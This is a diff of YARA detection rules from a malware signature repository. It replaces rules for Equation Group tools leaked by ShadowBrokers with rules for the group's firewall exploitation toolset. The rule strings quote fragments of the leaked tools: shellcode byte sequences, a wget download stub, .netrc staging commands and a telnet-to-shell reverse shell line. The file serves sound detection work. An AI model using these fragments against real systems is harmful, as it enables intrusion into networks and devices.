+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L525-L540"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3c736fdfa96d5e99bc4d093c03a81b8a4f58501ec8c03a2891f9f694d88b5284"
+		logic_hash = "531f7039290b386f070378cb4ba49a57b5031fb16b3972b61f4fb904770fc4ac"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a6a9ab66d73e4b443a80a69ef55a64da7f0af08dfaa7e17eb19c327301a70bdf"
+		hash1 = "6b558a6b8bf3735a869365256f9f2ad2ed75ccaa0eefdc61d6274df4705e978b"
 
 	strings:
-		$x1 = "usage: %s hostip port cmd [printer_name]" fullword ascii
-		$x2 = "command must be less than 61 chars" fullword ascii
-		$s1 = "__rw_read_waiting" ascii
-		$s2 = "completed.1" fullword ascii
-		$s3 = "__mutexkind" ascii
-		$s4 = "__rw_pshared" ascii
+		$s1 = "IMPLANT" fullword ascii
+		$s2 = "KEEPGOING" fullword ascii
+		$s3 = "upgrade_implant" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 50KB and ( 4 of them and 1 of ( $x* ) ) ) or ( all of them )
+		( uint16( 0 ) == 0x457f and filesize < 200KB and 2 of them ) or ( all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Ebbisland : FILE
+rule SIGNATURE_BASE_EQGRP_Workit
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file ebbisland"
+		description = "EQGRP Toolset Firewall - file workit.py"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d30b9f26-c2c5-5ecb-9f63-e96017788e40"
-		date = "2017-04-08"
-		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L576-L594"
+		id = "b582f990-5bd5-592d-a7c0-475fdfffc38c"
+		date = "2016-08-16"
+		modified = "2023-01-27"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L542-L566"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1f4b5054d4239e23146f0764ffe9037b658ecdb9a5f479956c5c45abc1012a17"
+		logic_hash = "1fa61e8c2012e664fee97ff608bcd8845bbd9701fa02d39d49379f7f83a5636d"
 		score = 75
-		quality = 85
-		tags = "FILE"
+		quality = 35
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "eba07c98c7e960bb6c71dafde85f5da9f74fd61bc87793c87e04b1ae2d77e977"
+		hash1 = "fb533b4d255b4e6072a4fa2e1794e38a165f9aa66033340c2f4f8fd1da155fac"
 
 	strings:
-		$x1 = "Usage: %s [-V] -t <target_ip> -p port" fullword ascii
-		$x2 = "error - shellcode not as expected - unable to fix up" fullword ascii
-		$x3 = "WARNING - core wipe mode - this will leave a core file on target" fullword ascii
-		$x4 = "[-C] wipe target core file (leaves less incriminating core on failed target)" fullword ascii
-		$x5 = "-A <jumpAddr> (shellcode address)" fullword ascii
-		$x6 = "*** Insane undocumented incremental port mode!!! ***" fullword ascii
+		$s1 = "macdef init > /tmp/.netrc;" fullword ascii
+		$s2 = "/usr/bin/wget http://" ascii
+		$s3 = "HOME=/tmp ftp" fullword ascii
+		$s4 = " >> /tmp/.netrc;" fullword ascii
+		$s5 = "/usr/rapidstream/bin/tftp" fullword ascii
+		$s6 = "created shell_command:" fullword ascii
+		$s7 = "rm -f /tmp/.netrc;" fullword ascii
+		$s8 = "echo quit >> /tmp/.netrc;" fullword ascii
+		$s9 = "echo binary >> /tmp/.netrc;" fullword ascii
+		$s10 = "chmod 600 /tmp/.netrc;" fullword ascii
+		$s11 = "created cli_command:" fullword ascii
 
 	condition:
-		filesize < 250KB and 1 of them
+		6 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Jackpop : FILE
+rule SIGNATURE_BASE_EQGRP_Tinyhttp_Setup : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file jackpop"
+		description = "EQGRP Toolset Firewall - file tinyhttp_setup.sh"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7c650752-200b-51e7-95c2-4d385bfd5844"
-		date = "2017-04-08"
+		id = "71dcc48f-f551-5596-9f03-dbbae470a62b"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L596-L614"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L568-L584"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6efc4ccd2727f93713ad35dc1f054fa25e976e8c3d95f00226fbd56d7f1ce30b"
+		logic_hash = "0d560206e634f3bfeffe5b7de3edf02f6c76443ffb5c0de37180e63276a19457"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0b208af860bb2c7ef6b1ae1fcef604c2c3d15fc558ad8ea241160bf4cbac1519"
+		hash1 = "3d12c83067a9f40f2f5558d3cf3434bbc9a4c3bb9d66d0e3c0b09b9841c766a0"
 
 	strings:
-		$x1 = "%x:%d  --> %x:%d %d bytes" fullword ascii
-		$s1 = "client: can't bind to local address, are you root?" fullword ascii
-		$s2 = "Unable to register port" fullword ascii
-		$s3 = "Could not resolve destination" fullword ascii
-		$s4 = "raw troubles" fullword ascii
+		$x1 = "firefox http://127.0.0.1:8000/$_name" fullword ascii
+		$x2 = "What is the name of your implant:" fullword ascii
+		$x3 = "killall thttpd" fullword ascii
+		$x4 = "copy http://<IP>:80/$_name flash:/$_name" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 30KB and 3 of them ) or ( all of them )
+		( uint16( 0 ) == 0x2123 and filesize < 2KB and 1 of ( $x* ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Parsescan : FILE
+rule SIGNATURE_BASE_EQGRP_Shellcode
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file parsescan"
+		description = "EQGRP Toolset Firewall - file shellcode.py"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bbe8b518-2bf0-5de4-8fb8-9b8609d393dc"
-		date = "2017-04-08"
+		id = "d923c1de-c6eb-511f-ae1f-bf3ac6e0eae8"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L616-L630"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L586-L605"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "25e0bc21f93cd72814cd6114883ed903af84a62dced126201b6037a476dbd2cd"
+		logic_hash = "69a04db721a0d17720f9db9386d47309f01d1fc31bd5e833cedb9e1c2eb573ae"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "942c12067b0afe9ebce50aa9dfdbf64e6ed0702d9a3a00d25b4fca62a38369ef"
+		hash1 = "ac9decb971dd44127a6ca0d35ac153951f0735bb4df422733046098eca8f8b7f"
 
 	strings:
-		$s1 = "$gotgs=1 if (($line =~ /Scan for (Sol|SNMP)\\s+version/) or" fullword ascii
-		$s2 = "Usage:  $prog [-f file] -p prognum [-V ver] [-t proto] -i IPadr" fullword ascii
+		$s1 = "execute_post = '\\xe8\\x00\\x00\\x00\\x00\\x5d\\xbe\\xef\\xbe\\xad\\xde\\x89\\xf7\\x89\\xec\\x29\\xf4\\xb8\\x03\\x00\\x00\\x00" ascii
+		$s2 = "tiny_exec = '\\x7f\\x45\\x4c\\x46\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x03\\x00\\x01\\x00\\x00" ascii
+		$s3 = "auth_id = '\\x31\\xc0\\xb0\\x03\\x31\\xdb\\x89\\xe1\\x31\\xd2\\xb6\\xf0\\xb2\\x0d\\xcd\\x80\\x3d\\xff\\xff\\xff\\xff\\x75\\x07" ascii
+		$c1 = { e8 00 00 00 00 5d be ef be ad de 89 f7 89 ec 29 f4 b8 03 00 00 00 }
+		$c3 = { 31 c0 b0 03 31 db 89 e1 31 d2 b6 f0 b2 0d cd 80 3d ff ff ff ff 75 07 }
 
 	condition:
-		filesize < 250KB and 1 of them
+		1 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Jscan : FILE
+rule SIGNATURE_BASE_EQGRP_EPBA : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file jscan"
+		description = "EQGRP Toolset Firewall - file EPBA.script"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c4cebc69-8ec8-5ad7-bd93-55565b3eb92b"
-		date = "2017-04-08"
+		id = "5159c2f4-20b7-590d-b216-b3468c26e459"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L632-L646"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L607-L626"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d3bbdb90da9fa5b8b41a8b5d35a9b42e4fa15f291146575b0ef22e81441dcbde"
+		logic_hash = "c483efdcfbb0dd8602a552b519d3aa52fca12549c0ec1660d813a2a1da66c3a6"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8075f56e44185e1be26b631a2bad89c5e4190c2bfc9fa56921ea3bbc51695dbe"
+		hash1 = "53e1af1b410ace0934c152b5df717d8a5a8f5fdd8b9eb329a44d94c39b066ff7"
 
 	strings:
-		$s1 = "$scanth = $scanth . \" -s \" . $scanthreads;" fullword ascii
-		$s2 = "print \"java -jar jscanner.jar$scanth$list\\n\";" fullword ascii
+		$x1 = "./epicbanana_2.0.0.1.py -t 127.0.0.1 --proto=ssh --username=cisco --password=cisco --target_vers=asa804 --mem=NA -p 22 " fullword ascii
+		$x2 = "-t TARGET_IP, --target_ip=TARGET_IP -- Either 127.0.0.1 or Win Ops IP" fullword ascii
+		$x3 = "./bride-1100 --lp 127.0.0.1 --implant 127.0.0.1 --sport RHP --dport RHP" fullword ascii
+		$x4 = "--target_vers=TARGET_VERS    target Pix version (pix712, asa804) (REQUIRED)" fullword ascii
+		$x5 = "-p DEST_PORT, --dest_port=DEST_PORT defaults: telnet=23, ssh=22 (optional) - Change to LOCAL redirect port" fullword ascii
+		$x6 = "this operation is complete, BananaGlee will" fullword ascii
+		$x7 = "cd /current/bin/FW/BGXXXX/Install/LP" fullword ascii
 
 	condition:
-		filesize < 250KB and 1 of them
+		( uint16( 0 ) == 0x2023 and filesize < 7KB and 1 of ( $x* ) ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Promptkill : FILE
+rule SIGNATURE_BASE_EQGRP_BPIE : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file promptkill"
+		description = "EQGRP Toolset Firewall - file BPIE-2201.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e0749b10-fa5a-5d73-86e1-e2008e121674"
-		date = "2017-04-08"
+		id = "a73f0216-3994-5ee6-8a8c-cbcc1279898e"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L648-L662"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L628-L648"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7b46161b8cbb9a539171349b3e2a58f8e5a48c344b6d99020b3e96da9c878771"
+		logic_hash = "ab13dde40015fba80f55bc9d1b82c94ec2421e9ea263b70ad8ec0a7a74c43c9a"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b448204503849926be249a9bafbfc1e36ef16421c5d3cfac5dac91f35eeaa52d"
+		hash1 = "697e80cf2595c85f7c931693946d295994c55da17a400f2c9674014f130b4688"
 
 	strings:
-		$x1 = "exec(\"xterm $xargs -e /current/tmp/promptkill.kid.$tag $pid\");" fullword ascii
-		$x2 = "$xargs=\"-title \\\"Kill process $pid?\\\" -name \\\"Kill process $pid?\\\" -bg white -fg red -geometry 202x19+0+0\" ;" fullword ascii
+		$s1 = "profProcessPacket" fullword ascii
+		$s2 = ".got_loader" fullword ascii
+		$s3 = "getTimeSlotCmdHandler" fullword ascii
+		$s4 = "getIpIpCmdHandler" fullword ascii
+		$s5 = "LOADED" fullword ascii
+		$s6 = "profStartScan" fullword ascii
+		$s7 = "tmpData.1" fullword ascii
+		$s8 = "resetCmdHandler" fullword ascii
 
 	condition:
-		filesize < 250KB and 1 of them
+		( uint16( 0 ) == 0x457f and filesize < 70KB and 6 of ( $s* ) )
 }
-rule SIGNATURE_BASE_Equationgroup_Epoxyresin_V1_0_0 : FILE
+rule SIGNATURE_BASE_EQGRP_Jetplow_SH
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file epoxyresin.v1.0.0.1"
+		description = "EQGRP Toolset Firewall - file jetplow.sh"
 		author = "Florian Roth (Nextron Systems)"
-		id = "390a13b0-3246-5bf7-8841-775a43045172"
-		date = "2017-04-08"
+		id = "e7780540-29c9-5827-8ac0-a685d9ba8a5f"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L664-L681"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L650-L666"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c1cbc18f05b299837463aa27a9c47ea0355ca5974b2c6ab1e0a18cc9ad1b26a1"
+		logic_hash = "8ae203527c4e41ae169c63521bb08d5199c43dfd1028574a1791ab1f8f198105"
 		score = 75
-		quality = 83
-		tags = "FILE"
+		quality = 85
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "eea8a6a674d5063d7d6fc9fe07060f35b16172de6d273748d70576b01bf01c73"
+		hash1 = "ee266f84a1a4ccf2e789a73b0a11242223ed6eba6868875b5922aea931a2199c"
 
 	strings:
-		$x1 = "[-] kernel not vulnerable" fullword ascii
-		$s1 = ".tmp.%d.XXXXXX" fullword ascii
-		$s2 = "[-] couldn't create temp file" fullword ascii
-		$s3 = "/boot/System.map-%s" fullword ascii
+		$s1 = "cd /current/bin/FW/BANANAGLEE/$bgver/Install/LP/jetplow" fullword ascii
+		$s2 = "***** Please place your UA in /current/bin/FW/OPS *****" fullword ascii
+		$s3 = "ln -s ../jp/orig_code.bin orig_code_pixGen.bin" fullword ascii
+		$s4 = "*****             Welcome to JetPlow              *****" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 30KB and $x1 ) or ( all of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Estopmoonlit : FILE
+rule SIGNATURE_BASE_EQGRP_BBANJO : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file estopmoonlit"
+		description = "EQGRP Toolset Firewall - file BBANJO-3011.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7ae7a8b7-5e27-5604-8c57-6d60ffa0fb72"
-		date = "2017-04-08"
+		id = "81af4769-7007-51f1-9569-bc370618b4ff"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L683-L699"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L668-L687"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "06293b6f48d2595f3426088cddc4b0c4d1ebc1de90fa640d5b5e806a45a2b6bd"
+		logic_hash = "8ee2e817732674bf7ff5f396271a2a90da8f401d7ea0f0a3f51c21712adb3ea4"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "707ecc234ed07c16119644742ebf563b319b515bf57fd43b669d3791a1c5e220"
+		hash1 = "f09c2f90464781a08436321f6549d350ecef3d92b4f25b95518760f5d4c9b2c3"
 
 	strings:
-		$x1 = "[+] shellcode prepared, re-executing" fullword ascii
-		$x2 = "[-] kernel not vulnerable: prctl" fullword ascii
-		$x3 = "[-] shell failed" fullword ascii
-		$x4 = "[!] selinux apparently enforcing.  Continue [y|n]? " fullword ascii
+		$s1 = "get_lsl_interfaces" fullword ascii
+		$s2 = "encryptFC4Payload" fullword ascii
+		$s3 = ".got_loader" fullword ascii
+		$s4 = "beacon_getconfig" fullword ascii
+		$s5 = "LOADED" fullword ascii
+		$s6 = "FormBeaconPacket" fullword ascii
+		$s7 = "beacon_reconfigure" fullword ascii
 
 	condition:
-		filesize < 250KB and 1 of them
+		( uint16( 0 ) == 0x457f and filesize < 50KB and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Envoytomato : FILE
+rule SIGNATURE_BASE_EQGRP_BPATROL_2201 : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file envoytomato"
+		description = "EQGRP Toolset Firewall - file BPATROL-2201.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d1a43c98-9448-5a03-824d-5cd8e959fbf5"
-		date = "2017-04-08"
+		id = "864a346c-e8aa-5c66-9867-faccb14b8bee"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L701-L715"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L689-L706"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f15b3b4281ec45a7a71c9bf8b88c60befec665f78b76a615c5912a6b7f94235b"
+		logic_hash = "a2e9aa4627924c99dd3a342174855df3f0d545a67fd2293ca5601eeae70ae010"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9bd001057cc97b81fdf2450be7bf3b34f1941379e588a7173ab7fffca41d4ad5"
+		hash1 = "aa892750b893033eed2fedb2f4d872f79421174eb217f0c34a933c424ae66395"
 
 	strings:
-		$s1 = "[-] kernel not vulnerable" fullword ascii
-		$s2 = "[-] failed to spawn shell" fullword ascii
+		$s1 = "dumpConfig" fullword ascii
+		$s2 = "getstatusHandler" fullword ascii
+		$s3 = ".got_loader" fullword ascii
+		$s4 = "xtractdata" fullword ascii
+		$s5 = "KEEPGOING" fullword ascii
 
 	condition:
-		filesize < 250KB and 1 of them
+		( uint16( 0 ) == 0x457f and filesize < 40KB and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Smash : FILE
+rule SIGNATURE_BASE_EQGRP_Extrabacon
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file smash"
+		description = "EQGRP Toolset Firewall - file extrabacon_1.1.0.1.py"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9a8cb090-4f47-5674-accb-f233dbb19b71"
-		date = "2017-04-08"
+		id = "79b998ef-e548-5038-b8ad-da1abf362e7f"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L717-L732"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L708-L725"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "073496e34dded05be40ee851442f9c0ec998f35e02a5d4221677a195b792f786"
+		logic_hash = "1a010d5e6324715f8e1bf29e957c365fabd2986fece53aaea23bba8ee59bd808"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1dc94b46aaff06d65a3bf724c8701e5f095c1c9c131b65b2f667e11b1f0129a6"
+		hash1 = "59d60835fe200515ece36a6e87e642ee8059a40cb04ba5f4b9cce7374a3e7735"
 
 	strings:
-		$x1 = "T=<target IP> [O=<port>] Y=<target type>" fullword ascii
-		$x2 = "no command given!! bailing..." fullword ascii
-		$x3 = "no port. assuming 22..." fullword ascii
+		$x1 = "To disable password checking on target:" fullword ascii
+		$x2 = "[-] target is running" fullword ascii
+		$x3 = "[-] problem importing version-specific shellcode from" fullword ascii
+		$x4 = "[+] importing version-specific shellcode" fullword ascii
+		$s5 = "[-] unsupported target version, abort" fullword ascii
 
 	condition:
-		filesize < 250KB and 1 of them
+		1 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Ratload : FILE
+rule SIGNATURE_BASE_EQGRP_Sploit_Py
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file ratload"
+		description = "EQGRP Toolset Firewall - file sploit.py"
 		author = "Florian Roth (Nextron Systems)"
-		id = "81590569-e81b-5d97-8295-cc6f018fab98"
-		date = "2017-04-08"
+		id = "9f403965-5fb1-55b2-bef6-65c18e08e58f"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L734-L749"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L727-L742"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "34298175663a01b26e317c31c720f2f4fe93a5c7e375c9642664479d8672e8cd"
+		logic_hash = "874eaffcbc191951db39ba6c85e8c80b83b0df8d33136b6cdcdefcb28e596474"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4a4a8f2f90529bee081ce2188131bac4e658a374a270007399f80af74c16f398"
+		hash1 = "0316d70a5bbf068a7fc791e08e816015d04ec98f088a7ff42af8b9e769b8d1f6"
 
 	strings:
-		$x1 = "/tmp/ratload.tmp.sh" fullword ascii
-		$x2 = "Remote Usage: /bin/telnet locip locport < /dev/console | /bin/sh\"" fullword ascii
-		$s6 = "uncompress -f ${NAME}.Z && PATH=. ${ARGS1} ${NAME} ${ARGS2} && rm -f ${NAME}" fullword ascii
+		$x1 = "the --spoof option requires 3 or 4 fields as follows redir_ip" ascii
+		$x2 = "[-] timeout waiting for response - target may have crashed" fullword ascii
+		$x3 = "[-] no response from health check - target may have crashed" fullword ascii
 
 	condition:
-		filesize < 250KB and 1 of them
+		1 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Ys : FILE
+rule SIGNATURE_BASE_EQGRP_Uninstallpbd
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file ys.auto"
+		description = "EQGRP Toolset Firewall - file uninstallPBD.bat"
 		author = "Florian Roth (Nextron Systems)"
-		id = "abd120e7-23f8-530e-b21e-c50a2b571332"
-		date = "2017-04-08"
+		id = "0153cb2a-a0de-51f9-80c2-22136d56f16d"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L751-L766"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L744-L759"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4962cc732ce3dea6dc52c7d91ce94089eb4498ba4c442ecc6363ea75de47de31"
+		logic_hash = "51be8a491a1e228dfc6156a86e9f2ffc923c39d0649bbc031ea1bafe1af22a45"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a6387307d64778f8d9cfc60382fdcf0627cde886e952b8d73cc61755ed9fde15"
+		hash1 = "692fdb449f10057a114cf2963000f52ce118d9a40682194838006c66af159bd0"
 
 	strings:
-		$x1 = "EXPLOIT_SCRIPME=\"$EXPLOIT_SCRIPME\"" fullword ascii
-		$x3 = "DEFTARGET=`head /current/etc/opscript.txt 2>/dev/null | grepip 2>/dev/null | head -1`" fullword ascii
-		$x4 = "FATAL ERROR: -x port and -n port MUST NOT BE THE SAME." fullword ascii
+		$s1 = "memset 00e9a05c 4 38845b88" fullword ascii
+		$s2 = "_hidecmd" ascii
+		$s3 = "memset 013abd04 1 0d" fullword ascii
 
 	condition:
-		filesize < 250KB and 1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Ewok : FILE
+rule SIGNATURE_BASE_EQGRP_BICECREAM : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file ewok"
+		description = "EQGRP Toolset Firewall - file BICECREAM-2140"
 		author = "Florian Roth (Nextron Systems)"
-		id = "379c233f-86f8-5116-a15c-8a80b27daea6"
-		date = "2017-04-08"
+		id = "a10819ae-db48-5d30-8e2e-2e4fe33e005b"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L768-L784"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L761-L782"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d10d75885daa8cd20e5d7d7e142d1e7a2dbc10a50debf7892629f67b948bbdbe"
+		logic_hash = "adaa6b7d4bf9e6f95fbae781382e72afc07993582473cbee7139a93df0fe3283"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "567da502d7709b7814ede9c7954ccc13d67fc573f3011db04cf212f8e8a95d72"
+		hash1 = "4842076af9ba49e6dfae21cf39847b4172c06a0bd3d2f1ca6f30622e14b77210"
 
 	strings:
-		$x1 = "Example: ewok -t target public" fullword ascii
-		$x2 = "Usage:  cleaner host community fake_prog" fullword ascii
-		$x3 = "-g  - Subset of -m that Green Spirit hits " fullword ascii
